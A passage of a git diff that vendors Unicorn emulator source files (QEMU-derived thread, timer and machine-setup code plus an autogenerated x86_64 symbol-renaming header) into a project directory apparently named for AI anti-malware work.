Copyright Red Hat, Inc. 2009 + * + * Author: + * Marcelo Tosatti + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ +#include +#include +#include +#include +#include +#include "unicorn/platform.h" +#include +#include +#ifdef __linux__ +#include +#include +#endif +#include "qemu/thread.h" +#include "qemu/atomic.h" + +static void error_exit(int err, const char *msg) +{ + fprintf(stderr, "qemu: %s: %s\n", msg, strerror(err)); + abort(); +} + +int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, + void *(*start_routine)(void*), + void *arg, int mode) +{ + sigset_t set, oldset; + int err; + pthread_attr_t attr; + + err = pthread_attr_init(&attr); + if (err) { + error_exit(err, __func__); + return -1; + } + if (mode == QEMU_THREAD_DETACHED) { + err = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED); + if (err) { + error_exit(err, __func__); + return -1; + } + } + + /* Leave signal handling to the iothread. */ + sigfillset(&set); + pthread_sigmask(SIG_SETMASK, &set, &oldset); + err = pthread_create(&thread->thread, &attr, start_routine, arg); + if (err) { + error_exit(err, __func__); + return -1; + } + + pthread_sigmask(SIG_SETMASK, &oldset, NULL); + + pthread_attr_destroy(&attr); + + return 0; +} + +void qemu_thread_exit(struct uc_struct *uc, void *retval) +{ + pthread_exit(retval); +} + +void *qemu_thread_join(QemuThread *thread) +{ + int err; + void *ret; + + err = pthread_join(thread->thread, &ret); + if (err) { + error_exit(err, __func__); + } + return ret; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-win32.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-win32.c new file mode 100644 index 0000000..3a85e6a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-thread-win32.c @@ -0,0 +1,159 @@ +/* + * Win32 implementation for mutex/cond/thread functions + * + * Copyright Red Hat, Inc. 2010 + * + * Author: + * Paolo Bonzini + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. + * + */ +#include "qemu-common.h" +#include "qemu/thread.h" +#include +#include +#include + +#include "uc_priv.h" + + +static void error_exit(int err, const char *msg) +{ + char *pstr; + + FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER, + NULL, err, 0, (LPTSTR)&pstr, 2, NULL); + fprintf(stderr, "qemu: %s: %s\n", msg, pstr); + LocalFree(pstr); + //abort(); +} + +struct QemuThreadData { + /* Passed to win32_start_routine. */ + void *(*start_routine)(void *); + void *arg; + short mode; + + /* Only used for joinable threads. */ + bool exited; + void *ret; + CRITICAL_SECTION cs; + struct uc_struct *uc; +}; + +static unsigned __stdcall win32_start_routine(void *arg) +{ + QemuThreadData *data = (QemuThreadData *) arg; + void *(*start_routine)(void *) = data->start_routine; + void *thread_arg = data->arg; + + if (data->mode == QEMU_THREAD_DETACHED) { + data->uc->qemu_thread_data = NULL; + g_free(data); + data = NULL; + } + qemu_thread_exit(data->uc, start_routine(thread_arg)); + abort(); +} + +void qemu_thread_exit(struct uc_struct *uc, void *arg) +{ + QemuThreadData *data = uc->qemu_thread_data; + + if (data) { + assert(data->mode != QEMU_THREAD_DETACHED); + data->ret = arg; + EnterCriticalSection(&data->cs); + data->exited = true; + LeaveCriticalSection(&data->cs); + } + _endthreadex(0); +} + +void *qemu_thread_join(QemuThread *thread) +{ + QemuThreadData *data; + void *ret; + HANDLE handle; + + data = thread->data; + if (!data) { + return NULL; + } + /* + * Because multiple copies of the QemuThread can exist via + * qemu_thread_get_self, we need to store a value that cannot + * leak there. The simplest, non racy way is to store the TID, + * discard the handle that _beginthreadex gives back, and + * get another copy of the handle here. + */ + handle = qemu_thread_get_handle(thread); + if (handle) { + WaitForSingleObject(handle, INFINITE); + CloseHandle(handle); + } + ret = data->ret; + assert(data->mode != QEMU_THREAD_DETACHED); + DeleteCriticalSection(&data->cs); + data->uc->qemu_thread_data = NULL; + g_free(data); + data = NULL; + return ret; +} + +int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, + void *(*start_routine)(void *), + void *arg, int mode) +{ + HANDLE hThread; + struct QemuThreadData *data; + + data = g_malloc(sizeof *data); + data->start_routine = start_routine; + data->arg = arg; + data->mode = mode; + data->exited = false; + data->uc = uc; + + uc->qemu_thread_data = data; + + if (data->mode != QEMU_THREAD_DETACHED) { + InitializeCriticalSection(&data->cs); + } + + hThread = (HANDLE) _beginthreadex(NULL, 0, win32_start_routine, + data, 0, &thread->tid); + if (!hThread) { + error_exit(GetLastError(), __func__); + return -1; + } + + CloseHandle(hThread); + thread->data = (mode == QEMU_THREAD_DETACHED) ? NULL : data; + + return 0; +} + +HANDLE qemu_thread_get_handle(QemuThread *thread) +{ + QemuThreadData *data; + HANDLE handle; + + data = thread->data; + if (!data) { + return NULL; + } + + assert(data->mode != QEMU_THREAD_DETACHED); + EnterCriticalSection(&data->cs); + if (!data->exited) { + handle = OpenThread(SYNCHRONIZE | THREAD_SUSPEND_RESUME, FALSE, + thread->tid); + } else { + handle = NULL; + } + LeaveCriticalSection(&data->cs); + return handle; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-timer-common.c b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-timer-common.c new file mode 100644 index 0000000..3ab3326 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/qemu-timer-common.c @@ -0,0 +1,43 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ +#include "qemu/timer.h" + +/***********************************************************/ +/* real time host monotonic timer */ + +#ifdef _WIN32 +int64_t clock_freq; + +INITIALIZER(init_get_clock) +{ + LARGE_INTEGER freq; + int ret; + ret = QueryPerformanceFrequency(&freq); + if (ret == 0) { + fprintf(stderr, "Could not calibrate ticks\n"); + exit(1); + } + clock_freq = freq.QuadPart; +} +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/util/setjmp-wrapper-win32.asm b/ai_anti_malware/unicorn/unicorn-master/qemu/util/setjmp-wrapper-win32.asm new file mode 100644 index 0000000..6e6b6ab --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/util/setjmp-wrapper-win32.asm @@ -0,0 +1,26 @@ +EXTERN _setjmp: proc +PUBLIC _setjmp_wrapper + +_TEXT SEGMENT + +_setjmp_wrapper PROC + +; Why do we need this wrapper? +; Short answer: Windows default implementation of setjmp/longjmp is incompatible with generated code. +; A longer answer: https://blog.lazym.io/2020/09/21/Unicorn-Devblog-setjmp-longjmp-on-Windows/. + +; From qemu os-win32 comments: +; > On w64, setjmp is implemented by _setjmp which needs a second parameter. +; > If this parameter is NULL, longjump does no stack unwinding. +; > That is what we need for QEMU. Passing the value of register rsp (default) +; > lets longjmp try a stack unwinding which will crash with generated code. +; It's true indeed, but MSVC doesn't has a setjmp signature which receives two arguements. +; Therefore, we add a wrapper to keep the second argument zero. +xor rdx, rdx +jmp _setjmp + +_setjmp_wrapper ENDP + +_TEXT ENDS + +END \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/vl.c b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.c new file mode 100644 index 0000000..f6c68b4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.c @@ -0,0 +1,156 @@ +/* + * QEMU System Emulator + * + * Copyright (c) 2003-2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh, 2015 */ + +#include "hw/boards.h" // MachineClass +#include "sysemu/sysemu.h" +#include "sysemu/cpus.h" +#include "vl.h" +#include "uc_priv.h" + +#define DEFAULT_RAM_SIZE 128 + +int smp_cpus = 1; +int smp_cores = 1; +int smp_threads = 1; + +// cpus.c +void cpu_resume(CPUState *cpu) +{ + cpu->stop = false; + cpu->stopped = false; +} + +void cpu_stop_current(struct uc_struct *uc) +{ + if (uc->current_cpu) { + uc->current_cpu->stop = false; + uc->current_cpu->stopped = true; + cpu_exit(uc->current_cpu); + } +} + + +/***********************************************************/ +/* machine registration */ + +MachineClass *find_default_machine(struct uc_struct *uc, int arch) +{ + GSList *el, *machines = object_class_get_list(uc, TYPE_MACHINE, false); + MachineClass *mc = NULL; + + for (el = machines; el; el = el->next) { + MachineClass *temp = el->data; + + if ((temp->is_default) && (temp->arch == arch)) { + mc = temp; + break; + } + } + + g_slist_free(machines); + return mc; +} + +DEFAULT_VISIBILITY +int machine_initialize(struct uc_struct *uc) +{ + MachineClass *machine_class; + MachineState *current_machine; + + module_call_init(uc, MODULE_INIT_QOM); + register_types_object(uc); + machine_register_types(uc); + container_register_types(uc); + cpu_register_types(uc); + qdev_register_types(uc); + + // Initialize arch specific. + uc->init_arch(uc); + + module_call_init(uc, MODULE_INIT_MACHINE); + // this will auto initialize all register objects above. + machine_class = find_default_machine(uc, uc->arch); + if (machine_class == NULL) { + //fprintf(stderr, "No machine specified, and there is no default.\n" + // "Use -machine help to list supported machines!\n"); + return -2; + } + + current_machine = MACHINE(uc, object_new(uc, object_class_get_name( + OBJECT_CLASS(machine_class)))); + uc->machine_state = current_machine; + current_machine->uc = uc; + uc->cpu_exec_init_all(uc); + + machine_class->max_cpus = 1; + configure_accelerator(current_machine); + + current_machine->cpu_model = NULL; + + return machine_class->init(uc, current_machine); +} + +void qemu_system_reset_request(struct uc_struct* uc) +{ + cpu_stop_current(uc); +} + +void qemu_system_shutdown_request(void) +{ + //shutdown_requested = 1; +} + +static void machine_class_init(struct uc_struct *uc, ObjectClass *oc, void *data) +{ + MachineClass *mc = MACHINE_CLASS(uc, oc); + QEMUMachine *qm = data; + + mc->family = qm->family; + mc->name = qm->name; + mc->init = qm->init; + mc->reset = qm->reset; + mc->max_cpus = qm->max_cpus; + mc->is_default = qm->is_default; + mc->arch = qm->arch; +} + +void qemu_register_machine(struct uc_struct *uc, QEMUMachine *m, const char *type_machine, + void (*init)(struct uc_struct *uc, ObjectClass *oc, void *data)) +{ + char *name = g_strconcat(m->name, TYPE_MACHINE_SUFFIX, NULL); + TypeInfo ti = {0}; + ti.name = name; + ti.parent = type_machine; + ti.class_init = init; + ti.class_data = (void *)m; + + if (init == NULL) + ti.class_init = machine_class_init; + + type_register(uc, &ti); + g_free(name); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/vl.h b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.h new file mode 100644 index 0000000..fe216e7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/vl.h @@ -0,0 +1,7 @@ +#ifndef VL_H_ +#define VL_H_ + +int machine_initialize(struct uc_struct *uc); + +#endif + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/x86_64.h b/ai_anti_malware/unicorn/unicorn-master/qemu/x86_64.h new file mode 100644 index 0000000..9b05bec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/x86_64.h @@ -0,0 +1,3020 @@ +/* Autogen header for Unicorn Engine - DONOT MODIFY */ +#ifndef UNICORN_AUTOGEN_X86_64_H +#define UNICORN_AUTOGEN_X86_64_H +#define arm_release arm_release_x86_64 +#define aarch64_tb_set_jmp_target aarch64_tb_set_jmp_target_x86_64 +#define ppc_tb_set_jmp_target ppc_tb_set_jmp_target_x86_64 +#define use_idiv_instructions_rt use_idiv_instructions_rt_x86_64 +#define tcg_target_deposit_valid tcg_target_deposit_valid_x86_64 +#define helper_power_down helper_power_down_x86_64 +#define check_exit_request check_exit_request_x86_64 +#define address_space_unregister address_space_unregister_x86_64 +#define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_x86_64 +#define phys_mem_clean phys_mem_clean_x86_64 +#define tb_cleanup tb_cleanup_x86_64 +#define memory_map memory_map_x86_64 +#define memory_map_ptr memory_map_ptr_x86_64 +#define memory_unmap memory_unmap_x86_64 +#define memory_free memory_free_x86_64 +#define free_code_gen_buffer free_code_gen_buffer_x86_64 +#define helper_raise_exception helper_raise_exception_x86_64 +#define tcg_enabled tcg_enabled_x86_64 +#define tcg_exec_init tcg_exec_init_x86_64 +#define memory_register_types memory_register_types_x86_64 +#define cpu_exec_init_all cpu_exec_init_all_x86_64 +#define vm_start vm_start_x86_64 +#define resume_all_vcpus resume_all_vcpus_x86_64 +#define a15_l2ctlr_read a15_l2ctlr_read_x86_64 +#define a64_translate_init a64_translate_init_x86_64 +#define aa32_generate_debug_exceptions aa32_generate_debug_exceptions_x86_64 +#define aa64_cacheop_access aa64_cacheop_access_x86_64 +#define aa64_daif_access aa64_daif_access_x86_64 +#define aa64_daif_write aa64_daif_write_x86_64 +#define aa64_dczid_read aa64_dczid_read_x86_64 +#define aa64_fpcr_read aa64_fpcr_read_x86_64 +#define aa64_fpcr_write aa64_fpcr_write_x86_64 +#define aa64_fpsr_read aa64_fpsr_read_x86_64 +#define aa64_fpsr_write aa64_fpsr_write_x86_64 +#define aa64_generate_debug_exceptions aa64_generate_debug_exceptions_x86_64 +#define aa64_zva_access aa64_zva_access_x86_64 +#define aarch64_banked_spsr_index aarch64_banked_spsr_index_x86_64 +#define aarch64_restore_sp aarch64_restore_sp_x86_64 +#define aarch64_save_sp aarch64_save_sp_x86_64 +#define accel_find accel_find_x86_64 +#define accel_init_machine accel_init_machine_x86_64 +#define accel_type accel_type_x86_64 +#define access_with_adjusted_size access_with_adjusted_size_x86_64 +#define add128 add128_x86_64 +#define add16_sat add16_sat_x86_64 +#define add16_usat add16_usat_x86_64 +#define add192 add192_x86_64 +#define add8_sat add8_sat_x86_64 +#define add8_usat add8_usat_x86_64 +#define add_cpreg_to_hashtable add_cpreg_to_hashtable_x86_64 +#define add_cpreg_to_list add_cpreg_to_list_x86_64 +#define addFloat128Sigs addFloat128Sigs_x86_64 +#define addFloat32Sigs addFloat32Sigs_x86_64 +#define addFloat64Sigs addFloat64Sigs_x86_64 +#define addFloatx80Sigs addFloatx80Sigs_x86_64 +#define add_qemu_ldst_label add_qemu_ldst_label_x86_64 +#define address_space_access_valid address_space_access_valid_x86_64 +#define address_space_destroy address_space_destroy_x86_64 +#define address_space_destroy_dispatch address_space_destroy_dispatch_x86_64 +#define address_space_get_flatview address_space_get_flatview_x86_64 +#define address_space_init address_space_init_x86_64 +#define address_space_init_dispatch address_space_init_dispatch_x86_64 +#define address_space_lookup_region address_space_lookup_region_x86_64 +#define address_space_map address_space_map_x86_64 +#define address_space_read address_space_read_x86_64 +#define address_space_rw address_space_rw_x86_64 +#define address_space_translate address_space_translate_x86_64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_x86_64 +#define address_space_translate_internal address_space_translate_internal_x86_64 +#define address_space_unmap address_space_unmap_x86_64 +#define address_space_update_topology address_space_update_topology_x86_64 +#define address_space_update_topology_pass address_space_update_topology_pass_x86_64 +#define address_space_write address_space_write_x86_64 +#define addrrange_contains addrrange_contains_x86_64 +#define addrrange_end addrrange_end_x86_64 +#define addrrange_equal addrrange_equal_x86_64 +#define addrrange_intersection addrrange_intersection_x86_64 +#define addrrange_intersects addrrange_intersects_x86_64 +#define addrrange_make addrrange_make_x86_64 +#define adjust_endianness adjust_endianness_x86_64 +#define all_helpers all_helpers_x86_64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_x86_64 +#define alloc_entry alloc_entry_x86_64 +#define always_true always_true_x86_64 +#define arm1026_initfn arm1026_initfn_x86_64 +#define arm1136_initfn arm1136_initfn_x86_64 +#define arm1136_r2_initfn arm1136_r2_initfn_x86_64 +#define arm1176_initfn arm1176_initfn_x86_64 +#define arm11mpcore_initfn arm11mpcore_initfn_x86_64 +#define arm926_initfn arm926_initfn_x86_64 +#define arm946_initfn arm946_initfn_x86_64 +#define arm_ccnt_enabled arm_ccnt_enabled_x86_64 +#define arm_cp_read_zero arm_cp_read_zero_x86_64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_x86_64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_x86_64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_x86_64 +#define arm_cpu_finalizefn arm_cpu_finalizefn_x86_64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_x86_64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_x86_64 +#define arm_cpu_initfn arm_cpu_initfn_x86_64 +#define arm_cpu_list arm_cpu_list_x86_64 +#define cpu_loop_exit cpu_loop_exit_x86_64 +#define arm_cpu_post_init arm_cpu_post_init_x86_64 +#define arm_cpu_realizefn arm_cpu_realizefn_x86_64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_x86_64 +#define arm_cpu_register_types arm_cpu_register_types_x86_64 +#define cpu_resume_from_signal cpu_resume_from_signal_x86_64 +#define arm_cpus arm_cpus_x86_64 +#define arm_cpu_set_pc arm_cpu_set_pc_x86_64 +#define arm_cp_write_ignore arm_cp_write_ignore_x86_64 +#define arm_current_el arm_current_el_x86_64 +#define arm_dc_feature arm_dc_feature_x86_64 +#define arm_debug_excp_handler arm_debug_excp_handler_x86_64 +#define arm_debug_target_el arm_debug_target_el_x86_64 +#define arm_el_is_aa64 arm_el_is_aa64_x86_64 +#define arm_env_get_cpu arm_env_get_cpu_x86_64 +#define arm_excp_target_el arm_excp_target_el_x86_64 +#define arm_excp_unmasked arm_excp_unmasked_x86_64 +#define arm_feature arm_feature_x86_64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_x86_64 +#define gen_intermediate_code gen_intermediate_code_x86_64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_x86_64 +#define arm_gen_test_cc arm_gen_test_cc_x86_64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_x86_64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_x86_64 +#define arm_handle_psci_call arm_handle_psci_call_x86_64 +#define arm_is_psci_call arm_is_psci_call_x86_64 +#define arm_is_secure arm_is_secure_x86_64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_x86_64 +#define arm_ldl_code arm_ldl_code_x86_64 +#define arm_lduw_code arm_lduw_code_x86_64 +#define arm_log_exception arm_log_exception_x86_64 +#define arm_reg_read arm_reg_read_x86_64 +#define arm_reg_reset arm_reg_reset_x86_64 +#define arm_reg_write arm_reg_write_x86_64 +#define restore_state_to_opc restore_state_to_opc_x86_64 +#define arm_rmode_to_sf arm_rmode_to_sf_x86_64 +#define arm_singlestep_active arm_singlestep_active_x86_64 +#define tlb_fill tlb_fill_x86_64 +#define tlb_flush tlb_flush_x86_64 +#define tlb_flush_page tlb_flush_page_x86_64 +#define tlb_set_page tlb_set_page_x86_64 +#define arm_translate_init arm_translate_init_x86_64 +#define arm_v7m_class_init arm_v7m_class_init_x86_64 +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_x86_64 +#define ats_access ats_access_x86_64 +#define ats_write ats_write_x86_64 +#define bad_mode_switch bad_mode_switch_x86_64 +#define bank_number bank_number_x86_64 +#define bitmap_zero_extend bitmap_zero_extend_x86_64 +#define bp_wp_matches bp_wp_matches_x86_64 +#define breakpoint_invalidate breakpoint_invalidate_x86_64 +#define build_page_bitmap build_page_bitmap_x86_64 +#define bus_add_child bus_add_child_x86_64 +#define bus_class_init bus_class_init_x86_64 +#define bus_info bus_info_x86_64 +#define bus_unparent bus_unparent_x86_64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_x86_64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_x86_64 +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_x86_64 +#define call_recip_estimate call_recip_estimate_x86_64 +#define can_merge can_merge_x86_64 +#define capacity_increase capacity_increase_x86_64 +#define ccsidr_read ccsidr_read_x86_64 +#define check_ap check_ap_x86_64 +#define check_breakpoints check_breakpoints_x86_64 +#define check_watchpoints check_watchpoints_x86_64 +#define cho cho_x86_64 +#define clear_bit clear_bit_x86_64 +#define clz32 clz32_x86_64 +#define clz64 clz64_x86_64 +#define cmp_flatrange_addr cmp_flatrange_addr_x86_64 +#define code_gen_alloc code_gen_alloc_x86_64 +#define commonNaNToFloat128 commonNaNToFloat128_x86_64 +#define commonNaNToFloat16 commonNaNToFloat16_x86_64 +#define commonNaNToFloat32 commonNaNToFloat32_x86_64 +#define commonNaNToFloat64 commonNaNToFloat64_x86_64 +#define commonNaNToFloatx80 commonNaNToFloatx80_x86_64 +#define compute_abs_deadline compute_abs_deadline_x86_64 +#define cond_name cond_name_x86_64 +#define configure_accelerator configure_accelerator_x86_64 +#define container_get container_get_x86_64 +#define container_info container_info_x86_64 +#define container_register_types container_register_types_x86_64 +#define contextidr_write contextidr_write_x86_64 +#define core_log_global_start core_log_global_start_x86_64 +#define core_log_global_stop core_log_global_stop_x86_64 +#define core_memory_listener core_memory_listener_x86_64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_x86_64 +#define cortex_a15_initfn cortex_a15_initfn_x86_64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_x86_64 +#define cortex_a8_initfn cortex_a8_initfn_x86_64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_x86_64 +#define cortex_a9_initfn cortex_a9_initfn_x86_64 +#define cortex_m3_initfn cortex_m3_initfn_x86_64 +#define count_cpreg count_cpreg_x86_64 +#define countLeadingZeros32 countLeadingZeros32_x86_64 +#define countLeadingZeros64 countLeadingZeros64_x86_64 +#define cp_access_ok cp_access_ok_x86_64 +#define cpacr_write cpacr_write_x86_64 +#define cpreg_field_is_64bit cpreg_field_is_64bit_x86_64 +#define cp_reginfo cp_reginfo_x86_64 +#define cpreg_key_compare cpreg_key_compare_x86_64 +#define cpreg_make_keylist cpreg_make_keylist_x86_64 +#define cp_reg_reset cp_reg_reset_x86_64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_x86_64 +#define cpsr_read cpsr_read_x86_64 +#define cpsr_write cpsr_write_x86_64 +#define cptype_valid cptype_valid_x86_64 +#define cpu_abort cpu_abort_x86_64 +#define cpu_arm_exec cpu_arm_exec_x86_64 +#define cpu_arm_gen_code cpu_arm_gen_code_x86_64 +#define cpu_arm_init cpu_arm_init_x86_64 +#define cpu_breakpoint_insert cpu_breakpoint_insert_x86_64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_x86_64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_x86_64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_x86_64 +#define cpu_can_do_io cpu_can_do_io_x86_64 +#define cpu_can_run cpu_can_run_x86_64 +#define cpu_class_init cpu_class_init_x86_64 +#define cpu_common_class_by_name cpu_common_class_by_name_x86_64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_x86_64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_x86_64 +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_x86_64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_x86_64 +#define cpu_common_has_work cpu_common_has_work_x86_64 +#define cpu_common_initfn cpu_common_initfn_x86_64 +#define cpu_common_noop cpu_common_noop_x86_64 +#define cpu_common_parse_features cpu_common_parse_features_x86_64 +#define cpu_common_realizefn cpu_common_realizefn_x86_64 +#define cpu_common_reset cpu_common_reset_x86_64 +#define cpu_dump_statistics cpu_dump_statistics_x86_64 +#define cpu_exec_init cpu_exec_init_x86_64 +#define cpu_flush_icache_range cpu_flush_icache_range_x86_64 +#define cpu_gen_init cpu_gen_init_x86_64 +#define cpu_get_clock cpu_get_clock_x86_64 +#define cpu_get_real_ticks cpu_get_real_ticks_x86_64 +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_x86_64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_x86_64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_x86_64 +#define cpu_inb cpu_inb_x86_64 +#define cpu_inl cpu_inl_x86_64 +#define cpu_interrupt cpu_interrupt_x86_64 +#define cpu_interrupt_handler cpu_interrupt_handler_x86_64 +#define cpu_inw cpu_inw_x86_64 +#define cpu_io_recompile cpu_io_recompile_x86_64 +#define cpu_is_stopped cpu_is_stopped_x86_64 +#define cpu_ldl_code cpu_ldl_code_x86_64 +#define cpu_ldub_code cpu_ldub_code_x86_64 +#define cpu_lduw_code cpu_lduw_code_x86_64 +#define cpu_memory_rw_debug cpu_memory_rw_debug_x86_64 +#define cpu_mmu_index cpu_mmu_index_x86_64 +#define cpu_outb cpu_outb_x86_64 +#define cpu_outl cpu_outl_x86_64 +#define cpu_outw cpu_outw_x86_64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_x86_64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_x86_64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_x86_64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_x86_64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_x86_64 +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_x86_64 +#define cpu_physical_memory_map cpu_physical_memory_map_x86_64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_x86_64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_x86_64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_x86_64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_x86_64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_x86_64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_x86_64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_x86_64 +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_x86_64 +#define cpu_register cpu_register_x86_64 +#define cpu_register_types cpu_register_types_x86_64 +#define cpu_restore_state cpu_restore_state_x86_64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_x86_64 +#define cpu_single_step cpu_single_step_x86_64 +#define cpu_tb_exec cpu_tb_exec_x86_64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_x86_64 +#define cpu_to_be64 cpu_to_be64_x86_64 +#define cpu_to_le32 cpu_to_le32_x86_64 +#define cpu_to_le64 cpu_to_le64_x86_64 +#define cpu_type_info cpu_type_info_x86_64 +#define cpu_unassigned_access cpu_unassigned_access_x86_64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_x86_64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_x86_64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_x86_64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_x86_64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_x86_64 +#define crc32c_table crc32c_table_x86_64 +#define create_new_memory_mapping create_new_memory_mapping_x86_64 +#define csselr_write csselr_write_x86_64 +#define cto32 cto32_x86_64 +#define ctr_el0_access ctr_el0_access_x86_64 +#define ctz32 ctz32_x86_64 +#define ctz64 ctz64_x86_64 +#define dacr_write dacr_write_x86_64 +#define dbgbcr_write dbgbcr_write_x86_64 +#define dbgbvr_write dbgbvr_write_x86_64 +#define dbgwcr_write dbgwcr_write_x86_64 +#define dbgwvr_write dbgwvr_write_x86_64 +#define debug_cp_reginfo debug_cp_reginfo_x86_64 +#define debug_frame debug_frame_x86_64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_x86_64 +#define define_arm_cp_regs define_arm_cp_regs_x86_64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_x86_64 +#define define_debug_regs define_debug_regs_x86_64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_x86_64 +#define define_one_arm_cp_reg_with_opaque 